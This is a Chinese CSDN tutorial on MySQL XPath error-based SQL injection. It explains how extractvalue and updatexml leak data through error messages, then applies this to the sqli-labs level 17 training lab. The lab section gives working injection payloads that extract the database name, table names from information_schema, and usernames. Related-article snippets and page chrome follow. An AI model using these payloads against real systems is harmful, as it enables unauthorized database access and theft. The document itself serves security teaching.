mysql漏洞函数xpath_【渗透重点】原理分析+题目实战轻松掌握SQL注入

最新推荐文章于 2024-04-18 10:38:52 发布
最新推荐文章于 2024-04-18 10:38:52 发布
阅读量500 收藏 2
点赞数
文章标签: mysql漏洞函数xpath
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31905417/article/details/113460992
版权
原标题:【渗透重点】原理分析+题目实战轻松掌握SQL注入前言:SQL注入是web安全中最常见的攻击方式,SQL注入有很多方法,但如果只知道payload,不知道原理,感觉也很难掌握,这次就总结一下我所遇到的SQL注入方法,原理分析+题目实战。0 1Xpath报错注入涉及函数updatexml:对xml进行查询和修改extractvalue:对xml进行查询和修改报错语句构造selectextrac...
摘要由CSDN通过智能技术生成

原标题:【渗透重点】原理分析+题目实战轻松掌握SQL注入

前言:

SQL注入是web安全中最常见的攻击方式,SQL注入有很多方法,但如果只知道payload,不知道原理,感觉也很难掌握,这次就总结一下我所遇到的SQL注入方法,原理分析+题目实战。

0 1

Xpath报错注入

涉及函数

updatexml:对xml进行查询和修改

extractvalue:对xml进行查询和修改

报错语句构造

selectextractvalue( 1, concat( 0x7e, user, 0x7e));

mysql> selectextractvalue( 1, concat( 0x7e,user, 0x7e));

ERROR 1105(HY000): XPATH syntax error: '~root@localhost~'

selectupdatexml( 1, concat( 0x7e, version, 0x7e), 1);

mysql> selectupdatexml( 1, concat( 0x7e,version, 0x7e), 1);

ERROR 1105(HY000): XPATH syntax error: '~5.5.53~'

原理分析

extractvalue(xml_str , Xpath) 函数,按照Xpath语法从XML格式的字符串中提取一个值,如果函数中任意一个参数为NULL,返回值都是NULL。

其实就是对XML文档进行查询的函数,相当于HTML文件中用

等标签查找元素一样,第一个参数传入目标xml文档,第二个参数使用Xpath路径法表示的查找路径

举个简单例子:

selectextractvalue( 'abbbacccaaaa','/a/c');

寻找前一段xml文档内容中的a节点下的c节点

+----------------------------------------------------------+

| extractvalue( 'abbbacccaaaa','/a/c') |

+----------------------------------------------------------+

| accc |

+----------------------------------------------------------+

正常情况下的使用便是这样,但如果我们构造了不合法的Xpath ,MySQL便会出现语法错误,从而显示出XPath的内容。

30db85d57c354ea8e223a29471787a0e.png

发现报错时少了一部分,没有前面的root,产生这样的问题是因为Xpath语法只有遇到特殊字符时才会报错

那我们直接在需要连接的字符前添加特殊字符即可爆出我们想要的结果

19b34c05f456d545f3cc032ad37e667f.png

但是也要注意,报错的长度是有一定限制的,不要构造过长的payload,否则后面的字符串会被截断

4c39000e4bd521bbcee288da6b957397.png

updatexml函数 与extractvalue类似 ,是更新xml文档的函数

updatexml函数有三个参数,分别是(XML_document, XPath_string, new_value)

第一个参数:XML_document是 String格式,为XML文档对象的名称

第二个参数:XPath_string (Xpath格式的字符串)

第三个参数:new_value, String格式,替换查找到的符合条件的数据

原理相同,都是遇到特殊字符爆出错误

d09fbb6a3b2396cd1ad61a0b853543fe.png

题目实战

sqli-labs17关,涉及到xpath报错注入

uname尝试发现没有任何变化,尝试下passwd,发现单引号报错,且有报错信息,可以使用xpath报错注入 尝试下爆出数据库

uname=admin&passwd=1' or updatexml(1,concat(0x7e,database,0x7e),1) # &submit=Submit

0f3d2ad1a551f03543bd1e94b20b4f08.png

既然xpath报错注入可以,那就来一一爆出表、字段、值即可

payload:

uname=admin&passwd=1' or updatexml(1,( selectgroup_concat(table_name) from

information_schema.TABLES whereTABLE_SCHEMA= database), 1) # &submit=Submit

017e25ddcd27d1d58a87164c17e35ca3.png

下面就基本上将payload改下即可,但到爆值时会出一个问题

payload:

uname=admin&passwd=' or updatexml(1,concat(0x7e,( selectusername fromusers), 0x7e), 1) #&submit=Submit

最低0.47元/天 解锁文章
凡哥Eva
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL注入到XPath注入
m0_69305074的博客
04-28 1040
0x00 XPath基础知识 这个部分只是单纯铺垫XPath基础知识,不涉及注入,了解XPath可以跳过 这里直接引用 w3school的XPath教程 中间的案例,因为里面给了好多示例,基本一看就懂的那种。 XPath是什么? XPath是用来从XML文档中进行查找信息的语言。 XPath节点(Node) XPath中有7种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档(根)节点 这个没有太大了解的必要,知道节点这个名词就够了,不需要分得特别细致。 选取节点 后面都以..
xpath mysql_MySQLXPath使用详解
weixin_35671798的博客
01-19 690
今天我要为大家介绍的是XPathXPath是导航和查询XML文档的语言。我们从一个函数开始。UpdateXML()函数我们已经花了很多时间介绍ExtractValue()函数,但还没有介绍MySQL的其它XML函数,如UpdateXML(),因为我们先前主要将内容放在将XML文档中的数据导入到MySQL数据库中了,UpdateXML()是一个使用不同的XML标记匹配和替换XML块的函数。Extr...
SQL注入总结_sql注入csdn,简直无敌
最新发布
2301_76225325的博客
04-18 363
当and后面得到的布尔值为True时,得到的页面是一种类型,为False时得到的页面又是另一种情况,因此,可以通过脚本实现自动化攻击,以下提供一个方法可以爆破,利用标志法,先可以先初始化一个sign=0,当每一次遍历字符串时遇到了布尔为True时sign+=1,每循环一次时判断一下sign的值是否为1,如果是,继续循环,不是的话则说明查询结束,或者如果查询的值的格式为flag{}时,当查询到"}"时退出循环也可;当然,时间盲注的功能十分强大,一般情况下,只要布尔盲注能够完成的注入利用时间盲注也可以。
mysql漏洞函数xpath_XPATH注入
weixin_30185907的博客
01-28 661
前言在网上看到了一个XPATH注入,发现自己确实有的地方没见过。。就拿来学习了一下链接:XPATHXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在 XML 文档中对元素...
MYSQL注入之XPATH语法错误报错扩展
cyynid的博客
06-05 747
但是对于此类报错来说,其报错函数并不止上述提供的两个,不同的数据库版本有不同的报错函数,本文提供一个自动化脚本,可以自动化的检测各个版本的Xpath报错函数,其原理非常简单,就是通过爬虫爬取mysql官方文档的函数内容,构造报错输入,进行测试,来实现自动化的报错函数检测。#都处于标签scope="row"之下,并且没有被包裹,因此可以用xpath进行定位,然后使用正则提取出函数名。#都处于标签scope="row"之下,并且没有被包裹,因此可以用xpath进行定位,然后使用正则提取出函数名。
mysql中xml数据的xpath支持_Xpath完美操作XML数据库
weixin_39708636的博客
02-02 135
XPath 是XML的查询语言,和SQL的角色很类似。以下面XML为例,介绍XPath 的语法。Empire BurlesqueBob Dylan10.90Hide your heartBonnie Tyler9.90Greatest HitsDolly Parton9.90定位节点XML是树状结构,类似档案系统内数据夹的结构,XPath也类似档案系统的路径命名方式。不过XPath 是一种模式(P...
MySQL注入常用函数及逻辑运算
01-20
MySQL注入常用函数函数名称 函数功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@...
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
SQL注入 报错(updatexml与extractvalue函数介绍)-01
09-15
SQL注入报错(updatexml与extractvalue函数介绍) SQL注入是一种常见的Web应用安全漏洞,它是指攻击者通过在Web应用的输入中inject恶意的SQL代码,来获取或修改数据库中的数据。今天,我们将讨论SQL注入报错的两种...
sql_xml.rar_.sql文件数据表_sql to xml_xml 数据库
09-19
在许多数据库管理系统(如MySQL、SQL Server、Oracle等)中,都有内置的功能或者函数来实现这个功能。例如,在SQL Server中,我们可以使用`FOR XML`子句,将查询结果集转化为XML格式。这是一个简单的例子: ```sql ...
mysql xpath注入_XPath注入学习
weixin_26841957的博客
02-03 417
XPath注入学习这篇记录是看完先知社区:XPATH注入学习写的,所以可能很多内容是重复的。写这篇记录仅仅为了让自己更好的掌握XPath注入。0x01 XPath入门在学习XPath注入之前,先了解一下什么是XPath学习入口:W3school学习XPath按照我个人的理解,XPath就是用于查询xml节点的查询语句,类似于T-SQL。0x02 XPath注入原理XPath注入原理类似于SQL注入...
mysql xpath_xpath的常见操作
weixin_33196828的博客
02-10 122
#-*- coding: utf-8 -*-importscrapyimportsysimporthashlibfrom scrapy.contrib.spiders importCrawlSpider, Rulefrom scrapy.contrib.linkextractors importLinkExtractorfrom datetime import *from common_lib i...
xpath mysql_xpath定位方法详解
weixin_33362555的博客
01-19 137
1.xpath较复杂的定位方法:现在要引用id为“J_password”的input元素,可以像下面这样写:WebElement password = driver.findElement(By.xpath("//*[@id='J_login_form']/dl/dt/input[@id='J_password']"));其中//*[@id=’ J_login_form’]这一段是指在根元素下查找...
mysql对xml的支持
king_share的专栏
09-18 330
MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML(),下面是这两个函数的使用示例: 还是一样我们首先建立一个示例数据库,然后将范例中使用的XML文档输入到数据库中: CREATE TABLE x (doc VARCHAR(150)); INSERT INTO x VALUES (' A guide to the...
xpath /和//
zhaoyangjian724的专栏
12-01 6000
/ 和//区别: 1. 使用1个/ <html> <li>aaa</li> <li>bbb</li> <ul> <li class="item-0">a01<a href="link1.html">first item&am
Xpath报错注入(extractvalue和updatexml)
石页
03-25 1267
updatexml() 函数报错注入原理 updatexml() 函数定义 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; updatexml() 函数运行机制 该函数XPath_string进行查询操作
xpath mysql_xpath 定位小技巧
weixin_33400538的博客
02-22 82
绝对路径定位find_element_by_xpath('/html/body/div[1]/*[2]/input')/表示从根节点开始,body中的第一个div标签下的第二个标签(*表示匹配所有类型标签)下的input标签。注意这个同级下第几个元素是从1开始的,同级下只有一个该标签就不用指定第几个了,比如上面的input利用元素属性进行定位find_element_by_xpath('//img...
[乐意黎原创]关于xpath中的.// 和 //
打杂人
11-08 9791
在今天之前,一直没有注意过.//的用法,习惯性的都是用//来查元素。比如在 <div id="div_menu"><p name="p1">Menu</p></div> <div id="div_title"><p name="p1">Title</p></div> 中找id="div_menu"的...
mysql语法元素_XPath语法
weixin_35907598的博客
02-08 92
在SQL Server 2005中,FOR XML 功能得到了增强,它有了对根元素和元素名称的新的选项、使用FOR XML 调用以便你可以建立复杂的层次关系的能力、和一个新的使得你可以定义将要使用XPath 语法来提取的XML结构的PATH 模式,如下面的示例所示: SELECT ProductID在SQL Server 2005中,FOR XML 功能得到了增强,它有了对根元素和元素名称的新的选...
sparksql中的xpath_string函数
05-19
在 Spark SQL 中,`xpath_string` 函数用于从 XML 数据中提取指定节点的文本值。它接受两个参数:XML 字符串和 XPath 表达式。 XPath 是一种用于在 XML 文档中定位节点的语言。它使用路径表达式来选择节点或节点集合。例如,以下 XPath 表达式可以选择 XML 文档中所有名为 "book" 的节点: ``` //book ``` 要使用 `xpath_string` 函数,您需要先将 XML 数据加载到一个 Spark SQL 表中。然后,您可以使用以下语法调用该函数: ```sql SELECT xpath_string(xml_column, xpath_expression) FROM table_name ``` 其中,`xml_column` 是包含 XML 数据的列名,`xpath_expression` 是您要提取文本值的节点的 XPath 表达式。 以下是一个使用 `xpath_string` 函数的示例 SQL 查询: ```sql SELECT xpath_string(xml_data, '//book/title') AS book_title FROM books_table ``` 该查询将从 `books_table` 表中选择 `xml_data` 列中的所有 XML 数据,并提取每个文档中名为 "title" 的节点的文本值。提取的值将作为名为 `book_title` 的新列返回。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值